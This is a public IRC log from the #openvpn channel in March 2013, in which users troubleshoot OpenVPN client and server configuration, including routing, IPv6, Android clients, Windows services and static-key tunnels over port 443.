pekster> This is an OpenVPN connection? And do you control the server? 16:45 < rob0> I'd guess "yes, no." So you'd ask the ISP for another account. 16:45 < rob0> or, if both are at the same site, route the second one's traffic through the one which is connected to the VPN. 17:14 -!- Orbi [~opera@anon-163-5.vpn.ipredator.se] has quit [Ping timeout: 260 seconds] 17:31 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 17:33 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 245 seconds] 17:34 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 17:44 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 17:44 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 252 seconds] 17:45 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 17:46 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 17:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 17:59 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has joined #openvpn 17:59 < _d4vid> hi again 17:59 < _d4vid> how to set openvpn for specific port? 17:59 < _d4vid> like 80 18:00 < _d4vid> i mean client config 18:01 < pekster> _d4vid: You can add the port to the end of the --remote command after the target IP/host, or use the --rport. Use of --port implies both --rport and --lport, unless you also specify --nobind 18:39 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:41 -!- master_o1_master [~master_of@p4FF24D9B.dip.t-dialin.net] has joined #openvpn 18:44 -!- master_of_master [~master_of@p4FF2495D.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 19:33 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 19:38 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 20:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 20:57 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 21:03 -!- m0r0n|3 [~kvirc@dsl-67-55-0-106.acanac.net] has quit [Ping timeout: 264 seconds] 21:22 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 21:24 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 21:27 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection] 21:28 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn 21:28 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Read error: Connection reset by peer] 21:29 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn 21:37 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection] 21:41 -!- sw0rdfish [sw0rdfish@fr2.v6.nightmare.panicbnc.eu] has quit [Changing host] 21:41 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 21:49 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host] 21:50 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 21:50 -!- mode/#openvpn [+v hazardous] by ChanServ 22:04 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 246 seconds] 22:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 22:20 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 22:23 -!- edwardly [~edwardly@cpe-72-190-113-138.tx.res.rr.com] has joined #openvpn 22:27 < edwardly> Hi, I'm trying to use the Android OpenVPN client, but I keep getting an error about remote_host not being a correct IP for the gateway. Does OpenVPN for Android require root or something else set up for it to work? 22:27 < edwardly> The error: error parsing ipv4 route: [route] [remote_host] [255.255.255.255] [net_gateway] : addr_pair_mask_parse_error: AddrMaskPair parse error 'route': remote_host/255.255.255.255 : ip_parse_exception: error parsing route IP address 'remote_hos... 22:28 < edwardly> It cuts off the rest. If you'd like the config I can get that as well, just will take a bit, and I'm not sure if it's needed if it's just that I need to root my Nexus 7. 22:38 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn 22:43 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection] 22:43 -!- HyperGlide [~HyperGlid@125.69.7.147] has joined #openvpn 22:50 < pppingme> edwardly what version android you running? 22:50 < pppingme> and what do you have as the address for the remote server? 22:50 < edwardly> 4.2.2 22:51 < edwardly> It's an ovpn file someone else generated 22:51 < edwardly> remote vpn.limestonenetworks.com 1195 22:53 < pppingme> are you trying to use a tun or tap interface? 22:53 < edwardly> I am trying to use OpenVPN connect. It looks like it is attempting to use a TUN interface 22:54 < edwardly> Sorry,I missed the start of the error: Tuninterface setup failed: tun_builder_error: and then the rest 22:55 < pppingme> hmm I don't know the android client that well, but the two big things are it needs something above 4 on the android side, which you are, and it only works over tun, nto tap, which you think you're doing.. 22:55 < edwardly> Also, I mean what I said as I'm trying to use OpenVPN connect for android, so I don't know where I'd even change betwen tun or tap 22:56 < pppingme> the server is also setup for tun, right? 22:57 < pppingme> not just the client.. 23:03 -!- newbie|4 [~tjz@bb219-74-189-54.singnet.com.sg] has quit [Quit: quit irc] 23:03 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 23:05 < edwardly> Yes, the server is set up for tun 23:24 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Read error: Connection reset by peer] 23:24 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 23:27 -!- HyperGlide [~HyperGlid@125.69.7.147] has quit [Remote host closed the connection] 23:30 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Remote host closed the connection] --- Day changed Sun Mar 17 2013 00:00 -!- AlbinoGeek [AcademyInt@S0106602ad0846dde.vs.shawcable.net] has joined #openvpn 00:00 < AlbinoGeek> Quick question, concerning the whole "add keys" section of the man; if I already have users, which commands do I __NOT__ run (to not delete the current CA, etc?) 00:02 < AlbinoGeek> Nevermind, got it; just need to skip the CA stuff and it uses the existing ones. 00:02 -!- AlbinoGeek [AcademyInt@S0106602ad0846dde.vs.shawcable.net] has left #openvpn ["I need a new part message."] 00:15 -!- JSharpe [~JSharpe@web.sinexdigitalrecovery.com] has quit [Ping timeout: 252 seconds] 00:24 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 00:39 < edwardly> I had to use the OpenVPN for Android package, the OpenVPN Connect one which is the official doesn't work with remote_host I guess? 00:40 -!- ddlk [~ddlk@115.211.187.28] has joined #openvpn 00:40 < ddlk> Anybody has experience with tunneling OpenVPN with Stunnel? 00:41 < ddlk> my vpn client can reach the stunnel server via stunnel client, but cannot establish the connection with vpn server 00:45 < pppingme> why are you trying to use OpenVPN wiht stunnel? 00:46 < pppingme> OpenVPN already encrypts, there's no need for stunnel 00:49 < ddlk> China gov has the ability to block OpenVPN connection 00:50 < ddlk> Have to use standard SSL to connect to port 443 to establish the connection 00:50 < pppingme> run it on a different port, and possibly with tcp instead of udp 00:51 < ddlk> the stunnel server must listen on 443, as I said. I think it's iptables issue, cannot figure out how to config it 00:52 < pppingme> its generally not a good thing to run encryption over encryption, its just going to give you headaches 00:52 < pppingme> just run openvpn over 443 00:53 < ddlk> Already tried that, openvpn on port 443 with TCP, no luck 00:54 < ddlk> nothing can give me more headaches than cannot use google 00:54 < pppingme> keep it simple, don't complicate it, thats why you're having so many problems troubleshooting it 00:54 < ddlk> Any suggestions? 00:54 < pppingme> once you simplify it, come back and ask for help 00:55 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 00:56 < ddlk> it's not complicated at all, just tunneling vpn via stunnel 00:57 < pppingme> I doubt you'll find any help with that mess.. 00:57 < pppingme> I've already offered if you dump the **** setup, but if you insist in keeping it, I refuse 00:59 <@EugeneKay> pppingme - it's OK to fuckign swear 00:59 <@EugeneKay> We're all(should be) adults here. 00:59 < ddlk> well... I am not .... 01:00 < pppingme> then you need to go ask your mommy and daddy before you get on the big bad computer.. 01:07 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 248 seconds] 01:08 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 01:16 -!- master_of_master [~master_of@p4FF248F1.dip.t-dialin.net] has joined #openvpn 01:19 -!- master_o1_master [~master_of@p4FF24D9B.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 01:36 < pekster> ddlk: OpenVPN in static key over an obscure port should help. Symmetric crypto has no identifying handshake and no protocol to match on 01:36 < pekster> !statickey 01:36 <@vpnHelper> "statickey" is (#1) you can use static keys by using --secret or (#2) static keys only work for ptp links, not client/server. They also do not provide forward encryption. A forward-secure encryption scheme (such as openvpn uses with certs) protects secret keys from exposure by evolving the keys with time. or (#3) see !forwardsecurity for more info 01:37 < pekster> If you want the benefit of Perfect Forward Secrecy over that, you can technically run a TLS VPN over a static tunnel, although if your goal is bypassing censorship in China, a pure static key tunnel may be all you want/need 02:07 -!- newbie|3 [~tjz@bb219-74-189-54.singnet.com.sg] has joined #openvpn 02:10 < ddlk> Thanks for the hint, pekster 02:10 -!- tjz [~tjz@unaffiliated/tjz] has quit [Ping timeout: 276 seconds] 02:11 < ddlk> tring that, but I got stuck on the server, the log says: UDPv4 link remote: [undef] 02:16 -!- master_o1_master [~master_of@p4FF2451B.dip.t-dialin.net] has joined #openvpn 02:18 -!- master_of_master [~master_of@p4FF248F1.dip.t-dialin.net] has quit [Read error: Operation timed out] 02:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 02:27 < pekster> ddlk: That's expected for a server that listens for external connections. The remote addressed is "undefined" in such a situation 02:33 < ddlk> that's to say, at this time I should start the client to connect to the server, right? but when I did so, the client also stuck at UDPv4 blah remote: my_ip 02:43 -!- brute11k [~brute@89.249.231.71] has joined #openvpn 02:43 -!- m0r0n [~kvirc@CPE647002deb0dd-CM001bd71e7460.cpe.net.cable.rogers.com] has joined #openvpn 02:45 -!- master_of_master [~master_of@p4FF24DCF.dip.t-dialin.net] has joined #openvpn 02:46 -!- master_o1_master [~master_of@p4FF2451B.dip.t-dialin.net] has quit [Read error: Operation timed out] 02:57 -!- m0r0n [~kvirc@CPE647002deb0dd-CM001bd71e7460.cpe.net.cable.rogers.com] has quit [Ping timeout: 264 seconds] 03:02 -!- ddlk [~ddlk@115.211.187.28] has quit [] 03:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 03:14 -!- ddlk [~ddlk@115.211.187.28] has joined #openvpn 03:14 < ddlk> pekster: finally got it worked, have to use the tcp on 443 with static key 03:14 -!- master_o1_master [~master_of@p4FF24CF8.dip.t-dialin.net] has joined #openvpn 03:17 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has joined #openvpn 03:18 -!- master_of_master [~master_of@p4FF24DCF.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 03:20 -!- master_of_master [~master_of@p4FF24393.dip.t-dialin.net] has joined #openvpn 03:20 -!- master_o1_master [~master_of@p4FF24CF8.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 03:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 03:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 03:32 -!- master_o1_master [~master_of@p4FF24A7F.dip.t-dialin.net] has joined #openvpn 03:35 -!- master_of_master [~master_of@p4FF24393.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 03:38 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:39 -!- Orbi [~opera@anon-184-194.vpn.ipredator.se] has joined #openvpn 03:50 -!- master_of_master [~master_of@p4FF24D80.dip.t-dialin.net] has joined #openvpn 03:53 -!- master_o1_master [~master_of@p4FF24A7F.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 03:55 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 04:04 -!- master_o1_master [~master_of@p4FF24F40.dip.t-dialin.net] has joined #openvpn 04:05 -!- fluter [~fluter@fedora/fluter] has quit [Ping timeout: 246 seconds] 04:07 -!- master_of_master [~master_of@p4FF24D80.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 04:10 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:17 -!- master_of_master [~master_of@p4FF245AD.dip.t-dialin.net] has joined #openvpn 04:17 < pekster> ddlk: Good to hear. Yea, censorship sucks. With static key it's usually possible to tell that "something" is encrypted, but not what exactly it is. The stream has no definable start or end, nor any handshake; it's literally a bunch of random data 04:19 -!- master_o1_master [~master_of@p4FF24F40.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 04:20 < jzaw> that sounds like an advantage pekster 04:20 < jzaw> well done ddlk hate big brother 04:20 < pekster> At the expense of multi-client support and the TLS-based re-keying that provides perfect forward secrecy, yes 04:21 < pekster> Usually TLS is considered a "better" option, but static key has its advantages too (like this case) 04:21 * jzaw nods 04:21 < jzaw> btw im slowly adding *features* to my tunnel 04:21 < jzaw> ive got the ends pinging ipv6 04:22 < jzaw> each other 04:22 < jzaw> oh i compiled openvpn-testing 04:22 < pekster> Sure, if you don't mind testing some newer features, it's not a bad way to try out the new code 04:23 < jzaw> :) 04:23 < jzaw> at the mo for ipv4 im def1'ing 04:23 < jzaw> as i want to be able to ssh to at least 1 or 2 clients 04:25 < jzaw> btw pekster in the openvpn faq it strongly suggests using def1 .. out of curiosity why is that suggested over the other option of deleting old default gw and adding the new one ? 04:25 < jzaw> the latter being somewhat less confusing to the eye 04:26 < jzaw> when one does an ip route list 04:26 < jzaw> show 04:28 < pekster> jzaw: If you omit using def1, local DHCP renewal tends to wipe out the gateway again 04:29 < jzaw> ah thats one thing yes 04:29 < pekster> Using two /1 routes prevents any local automated processes like that from interfering with the redirectin 04:29 < jzaw> gotcha 04:29 < pekster> Use 2000::/3 in IPv6 for the same effect 04:29 < jzaw> i suppose thats more if the client isnt the remote network's gw though 04:30 < jzaw> since then it would likely be the dhcpd rather than dhcp client 04:30 < jzaw> is my thinking right? 04:31 < pekster> Depends on how the client is configured. It's generally preferred to use the 'def1' feature unless you are sure your local system won't be impacted by gateway changes at any other time 04:31 * jzaw nods 04:32 < jzaw> mine was working well till i rebooted the VM running ovpn server 04:32 < jzaw> then i pulled my hair out for 2 hours trying to get it routing properly again 04:32 -!- defsdoor [~andy@cpc30-sutt4-2-0-cust155.19-1.cable.virginmedia.com] has quit [Quit: Ex-Chat] 04:32 < jzaw> the only thing id forgotten was to edit /etc/sysctl.conf ... to permanently enable v4 forwarding 04:32 < pekster> You should try to fix that. Assuming you set it all up, you should be able to restart and have any services like that come back on startup 04:32 < jzaw> d'oh 04:32 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 04:33 < jzaw> fixed now ... shant forget that one again 04:33 < jzaw> i can reboot either end now and it all comes back up 04:34 < jzaw> pekster, i know i can send ipv6 down the established ipv4 tunnel 04:34 < jzaw> is it possible to have a purely ipv6 tunnel ? 04:35 < pekster> Using --tun-ipv6 I believe requires an IPv4 address configured as well, although you can just assign some rfc1918 subnet 04:36 < jzaw> for the tun/tap ? 04:36 < pekster> For tun anyway. tap is unaware of higher level protocols like IPv4 or IPv6 04:36 < jzaw> of course 04:37 < jzaw> but the server local ip and client local ... can be ipv6? 04:37 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 04:37 < pekster> Oh, sure, if you'd like to connect to your peer over IPv6 for the encapsulated packets 04:37 < jzaw> bingo! 04:38 < jzaw> ive mentioned before 04:38 < pekster> So use '--remote 2001:db8:abc::789' or '--remote ipv6.vpn.example.net' 04:38 < jzaw> having dual stack has saved me a couple of times 04:38 < jzaw> most recently ive killed my home lan ipv6 but could ssh in via ipv4 and fix it 04:38 < pekster> You can also just set up DNS to do the right thing and use the hostname. Assuming the client has working dual-stack and s properly configured DNS resolver, it'll all magically work 04:38 < jzaw> vice versa has happened too 04:39 < jzaw> in that case would it tend to prefre ipv6 ? 04:39 < jzaw> prefer 04:39 < pekster> I haven't actually tried that 04:39 < jzaw> or does it do what firexfox does ... which responds quicker gets used 04:40 < jzaw> most apps prefer ipv6 if its there .... mtr can be a pain sometimes 04:40 < pekster> I'm dual-stack at home through a v6 broker, and my browser always uses v6 when availalbe, although there's a setting for "fast v4 fallback" that IIRC is enabled by default (for broken IPv6 sites) 04:40 * jzaw nods 04:40 < jzaw> browser = firefox ? 04:40 < pekster> Yea 04:41 < pekster> Not sure about other browsers, although Iron (basically Chrome) seems to prefer v6 too 04:41 < jzaw> i think itll go for ipv4 even if theres ipv6 if v4 responds first 04:41 < pekster> It doesn't try both at once 04:41 < jzaw> it was explained to me that it does 04:41 < pekster> If it gets a quad-A record back, Firefox only initiates a connection to the IPv6 addresses 04:42 < jzaw> maybe we were chatting about a different feature /me shrugs 04:43 < jzaw> so it must have a time out on the v6 and falls back to v4 04:43 < jzaw> but doesnt do both at the same time 04:43 < pekster> Right 04:44 < pekster> I'm just not sure offhand how openvpn handles that. I'll have to set up a test on my internal DNS to assign a test system a v4+v6 address to see what the client does 04:44 < pekster> (but not tonight...) 04:44 < jzaw> :) 04:44 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:54 -!- kubbing [~kubbing@89.177.146.18] has quit [Ping timeout: 246 seconds] 04:58 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 04:59 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 05:17 -!- master_o1_master [~master_of@p4FF24C06.dip.t-dialin.net] has joined #openvpn 05:21 -!- master_of_master [~master_of@p4FF245AD.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 05:22 -!- A2tec [~Aztec@fightclub.de] has joined #openvpn 05:23 -!- kubbing [~kubbing@89.177.146.18] has joined #openvpn 05:26 -!- master_of_master [~master_of@p4FF24483.dip.t-dialin.net] has joined #openvpn 05:29 -!- master_o1_master [~master_of@p4FF24C06.dip.t-dialin.net] has quit [Ping timeout: 264 seconds] 05:31 -!- JSharpe [~JSharpe@146.185.24.18] has joined #openvpn 05:38 < Dennis84> hi all 05:46 < kisom> Morning 05:48 < Dennis84> Wulf: did you find some time to check the NULL-Pointer? 05:49 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 05:50 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 05:55 -!- Orbi [~opera@anon-184-194.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 05:55 -!- kubbing [~kubbing@89.177.146.18] has quit [Remote host closed the connection] 06:31 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:42 -!- ddlk [~ddlk@115.211.187.28] has quit [] 07:18 -!- p3rror [~mezgani@196.201.78.139] has joined #openvpn 07:39 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 240 seconds] 07:39 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 07:41 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 07:44 -!- p3rror [~mezgani@196.201.78.139] has quit [Ping timeout: 245 seconds] 07:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 07:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 07:57 -!- p3rror [~mezgani@41.140.196.35] has joined #openvpn 08:02 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 08:03 < hrenovo> hi. How can I get autovpn to autostart and autoconnect with windows ? 08:03 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 08:05 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 08:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:16 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:22 < hrenovo> hi. How can I get autovpn to autostart and autoconnect with windows ? 08:24 <@ecrist> set it up as a service 08:25 <@EugeneKay> hrenovo - the openvpn installer creates a Windows service named "openvpn". Place your config files into the install dir's "conf" folder, and enable this service. 08:25 <@EugeneKay> See also the README located inside the same config folder 08:29 < hrenovo> EugeneKay: where is the conf folder ? 08:30 -!- _d4vid [~stern@pdpc/supporter/student/d4vid] has left #openvpn ["http://incloak.com"] 08:30 <@EugeneKay> "the install dir's" 08:30 < hrenovo> this is for manual connection right ? C:\Program Files\OpenVPN\config 08:30 <@EugeneKay> Reading; it matters. 08:31 <@EugeneKay> That's the place 08:31 < hrenovo> ok, my config files are there and I am able to connect 08:31 < hrenovo> where is the option to auto start ? 08:31 <@ecrist> in the services control panel 08:31 <@EugeneKay> Go back and read what I said 08:31 <@ecrist> you need to set the openvpn service to auto start 08:31 <@EugeneKay> I'm not going to beat it into you 08:32 < hrenovo> how can I get it to auto start ? 08:32 < hrenovo> openvpn service 08:32 <@EugeneKay> Go back and read what I said 08:32 <@EugeneKay> I'm not going to beat it into you 08:32 -!- hrenovo was kicked from #openvpn by ecrist [please follow directions] 08:32 <@EugeneKay> The stupid is strong today. 08:33 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 08:34 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has left #openvpn ["I am parting"] 08:35 < rob0> what is "autovpn"? 08:36 <@EugeneKay> I didn't even notice that 09:04 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 09:19 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 09:20 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 09:42 -!- Guest18356 [~Terse@ARennes-257-1-41-133.w81-53.abo.wanadoo.fr] has joined #openvpn 09:42 -!- Guest18356 [~Terse@ARennes-257-1-41-133.w81-53.abo.wanadoo.fr] has left #openvpn [] 09:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:50 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 09:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit] 09:53 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 09:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit] 10:22 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 10:44 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 245 seconds] 11:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 11:06 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 11:42 -!- master_o1_master [~master_of@p4FF24D0B.dip.t-dialin.net] has joined #openvpn 11:45 -!- master_of_master [~master_of@p4FF24483.dip.t-dialin.net] has quit [Ping timeout: 245 seconds] 12:06 -!- Varazir [~mircwars@c-94-255-130-176.cust.bredband2.com] has quit [Ping timeout: 264 seconds] 12:07 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 12:10 < jzaw> \0/ yea ipv6 too 12:16 -!- Varazir [~mircwars@c-94-255-130-176.cust.bredband2.com] has joined #openvpn 12:19 < Martin`> :) 12:22 -!- siddhant [~chatzilla@64.62.201.17] has joined #openvpn 12:23 -!- siddhant is now known as sisar 13:19 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has left #openvpn ["Leaving IRC forever... :("] 13:24 -!- timmmaaaayyy [~timmmaaaa@cpe-68-175-79-100.nyc.res.rr.com] has joined #openvpn 13:26 < timmmaaaayyy> anyone want to help me get routing working on my openvpn setup? i cannot hit the LAN behind one of my clients. it's a windows client....i tried using iroute in the client config but it won't start vpn with that 13:26 < timmmaaaayyy> what other options do i have? 13:30 -!- hatschi [~marvin@dslb-178-010-117-249.pools.arcor-ip.net] has joined #openvpn 13:37 < rob0> !clientlan 13:37 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a 13:37 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 13:37 < rob0> check the flowchart 13:39 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 13:40 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 13:41 < timmmaaaayyy> oh so you can't just throw "iroute 192.168.0.0 255.255.255.0" into the config? i'll try using the client-confgi-dir method 13:42 < pekster> iroute tells openvpn that a specific client is responsible for a particular network 13:42 < pekster> You still need the --route entry in the server too, since --route impacts the OS routing table, while --iroute handles the association of the network to the openvpn client 13:43 < rob0> iroute can only be in a ccd, IIRC 13:44 < pekster> ccd or --client-connect 13:47 -!- hatschi [~marvin@dslb-178-010-117-249.pools.arcor-ip.net] has quit [Ping timeout: 240 seconds] 13:47 < timmmaaaayyy> ok thanks 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit] 14:05 < timmmaaaayyy> !ipforward 14:05 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall 14:05 < timmmaaaayyy> !winipforward 14:05 <@vpnHelper> "winipforward" is http://support.microsoft.com/kb/315236 to enable ip forwarding on windows 14:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 14:11 < timmmaaaayyy> i have the route entry in the server.conf, but it's not showing up in the OS routing table 14:11 < pekster> Did you restart the server openvpn instance after making the change? 14:12 < timmmaaaayyy> yes 14:12 < pekster> It should show up, or note in the logs why route addition failed 14:13 < timmmaaaayyy> Sun Mar 17 19:13:13 2013 OpenVPN ROUTE: failed to parse/resolve route for host/network: 192.168.0.0 14:15 < pekster> There's usually related context before/after that. Pastebin the full logs if you need help 14:15 < pekster> !paste 14:15 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 14:16 < timmmaaaayyy> http://pastebin.com/MbHZFM8c 14:16 < rob0> 192.168.0.x is not a good idea, BTW :) 14:17 < timmmaaaayyy> this is just temporary.....i'm setting something up that needs access to that subnet. once it's setup, i'm removing the config stuff and mailing it out 14:17 < pekster> Can you paste your config too, ideally with comments removed (see grep magic in next bot output.) Looks like you're using a mode that doesn't imply --route-gateway, or didn't add it yourself and need it 14:17 < pekster> !configs 14:17 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 14:18 < rob0> Sun Mar 17 19:14:55 2013 OpenVPN ROUTE: OpenVPN needs a gateway parameter for a --route option and no default was specified by either --route-gateway or --ifconfig options 14:18 < pekster> My guess is you're using --server in topology subnet, and you must manually define it in such a case 14:18 < pekster> But configs will show for sure 14:18 < pekster> rob0: I'm wondering if I should see about patching that; this issue comes up a lot 14:19 < pekster> Despite the warning :\ 14:19 < timmmaaaayyy> http://pastebin.com/xjceZs1w 14:19 < timmmaaaayyy> i'd love to clean this up if i can 14:19 < pekster> So simply, --route-gateway 10.8.0.1 will do what you need 14:20 < pekster> That's pushed to clients, but not present for the server, so the server has no target gateway to use for the routes 14:20 < timmmaaaayyy> would that be better? or should i remove topology subnet? i only have like 6 users, so i don't actually need the subnet thing....it just seemed cool 14:23 < rob0> the /30 mess is never useful 14:24 < timmmaaaayyy> i agree. ok i see it in the routing table now....that's good 14:24 < timmmaaaayyy> but i still can't ping the other side of the VPN client itself. it's ip is 192.168.0.13. 14:25 < timmmaaaayyy> i enabled forwarding according to the help docs here 14:25 < timmmaaaayyy> i wish this wasn't a windows machine 14:28 < timmmaaaayyy> 